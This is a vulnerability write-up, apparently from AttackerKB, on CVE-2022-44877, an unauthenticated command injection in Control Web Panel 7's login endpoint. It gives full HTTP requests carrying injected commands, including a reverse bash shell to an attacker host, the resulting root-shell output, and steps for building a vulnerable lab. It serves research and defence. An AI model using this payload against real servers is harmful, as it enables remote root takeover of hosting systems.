Very High
CVE-2022-44877
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2022-44877
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
This vulnerability is all about “Why Quotes Matter”
In December 2022, security researcher Numan Türle
from Gais Cyber Security
discovered an unauthenticated remote code execution vulnerability in the Control Web Panel 7 (CWP) application. They state on their website that CWP is a World Leading advanced Free and PRO web hosting panel that gives you all the flexibility to effectively and efficiently manage your server and clients.
The vulnerability is exposed thru the admin endpoint /login/index.php?login
which typically runs on port 2030
or 2086
for http
and port 2031
and port 2087
for https
. Successful exploitation results in command execution as the root
user. CWP versions 0.9.8.1146
and below are vulnerable.
The issue is triggered by the improper use of quotes when a failed login entry is logged in the /var/log/cwp_client_login.log
.
The example below shows why the proper usage of quotes is important when applied in a unix shell.
[root@localhost ~]# echo "$(whoami)" root [root@localhost ~]# echo '$(whoami)' $(whoami) [root@localhost ~]# echo "'$(whoami)'" 'root' [root@localhost ~]# echo ''$(whoami)'' root
In the first example, the inline bash command $(whoami)
gets executed within the echo
command using double quotes.
However, if you use single quotes, it is treated as text which is the standard unix shell behavior. But if you try to be smart and put double quotes around the single quotes, it again executes $(whoami)
because the single quotes are seen as text if surrounded by double quotes.
This is no secret to experienced unix admins, but typically software developers can be easily tricked when they use underlying unix shell commands and quotes in their programs.
And this is exactly the problem that triggers this vulnerability.
Let’s have a quick look, what is going under the hood….
Take the burp request below, where we will trigger a failed login entry using the existing default user root
with a wrong password.
POST /login/index.php?login= HTTP/1.1 Host: 192.168.100.89:2031 Content-Length: 46 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en Connection: close username=root&password=idonotcare&commit=Login
If we monitor the /var/log/cwp_client_login.log
then we can see an failed login entry.
[root@localhost ~]# tail -f /var/log/cwp_client_login.log 2023-01-14 17:37:04 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login='
If we do the same burp request, but now with our $(whoami)
added.
And surprise, surprise, the whoami
command gets executed (see second log entry).
[root@localhost ~]# tail -f /var/log/cwp_client_login.log 2023-01-14 17:37:04 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login=' 2023-01-14 17:40:25 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login=root'
Now lets take a reverse bash shell.
POST /login/index.php?login=$(bash -i >& /dev/tcp/192.168.100.7/4444 0>&1) HTTP/1.1 Host: 192.168.100.89:2031 Content-Length: 46 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en Connection: close username=root&password=idonotcare&commit=Login
And voila, a reverse shell as root
user on the target.
# nc -lnvp 4444 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 192.168.100.89. Ncat: Connection from 192.168.100.89:51988. bash: no job control in this shell [root@localhost login]# whoami whoami root You have new mail in /var/mail/root [root@localhost login]#
Another interesting piece is that you actually can see the command running in the process list that is writing the log entry to the log file.
You can clearly see the improper use of the double quotes in this command line.
root 12238 12231 0 03:41 ? 00:00:00 sleep 17897 root 12493 910 0 03:43 ? 00:00:37 php-fpm: pool cwpsrv postfix 27739 1538 0 07:41 ? 00:00:00 pickup -l -t fifo -u -o content_filter= -o receive_override_options=no_header_body_checks root 29668 2 0 08:02 ? 00:00:00 [kworker/0:3] root 30160 2 0 08:10 ? 00:00:00 [kworker/0:1] root 30718 2 0 08:15 ? 00:00:00 [kworker/0:0] root 30869 7118 0 08:17 ? 00:00:00 sh -c echo "2023-01-14 13:17:46 root Failed Login from: 192.168.100.7 on: 'https://localhost:2031/login/index.php?login=$(bash -i >& /dev/tcp/192.168.100.7/4444 0>&1)'" >> /var/log/cwp_client_login.log
If you want to test it yourself, please follow this guidance to build a vulnerable configuration. Please do not expose this to the Internet unless you want to be compromised ;–)
Before you execute step 7. sh cwp-el7-latest
, please edit the file and make the following adjustments to download the vulnerable version and prevent the auto update.
nano /usr/local/src/cwp-el7-latest >>>>> # wget static.cdn-cwp.com/files/cwp/el7/cwp-el7-0.9.8.1148.zip # unzip -o -q cwp-el7-0.9.8.1148.zip # rm -f cwp-el7-0.9.8.1148.zip wget static.cdn-cwp.com/files/cwp/el7/cwp-el7-0.9.8.1146.zip unzip -o -q cwp-el7-0.9.8.1146.zip >>>>> # update cwp chmod +x /scripts/cwp_api # sh /scripts/update_cwp sh /scripts/cwp_set_memory_limit >>>>>
After running the installation script which takes about 30 minutes, please rename /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp
to update_cwp.something
otherwise CWP will get updated to the latest version when you start the application.
Mitigation
The CWP application has an auto update feature that can not be disabled in the application. Therefore the likelihood to find any vulnerable CWP application in the wild is almost zero.
I have created a Metasploit module. A local version of this module can found at the References section.
References
Github
Packetstorm
Metasploit Development h00die-gr3y
Credits
Credits goes to the security researcher below who discovered and analyzed this vulnerability.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- control-webpanel
Products
- webpanel
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportWould you like to delete this Exploited in the Wild Report?
Yes, delete this reportWould you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
Miscellaneous
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: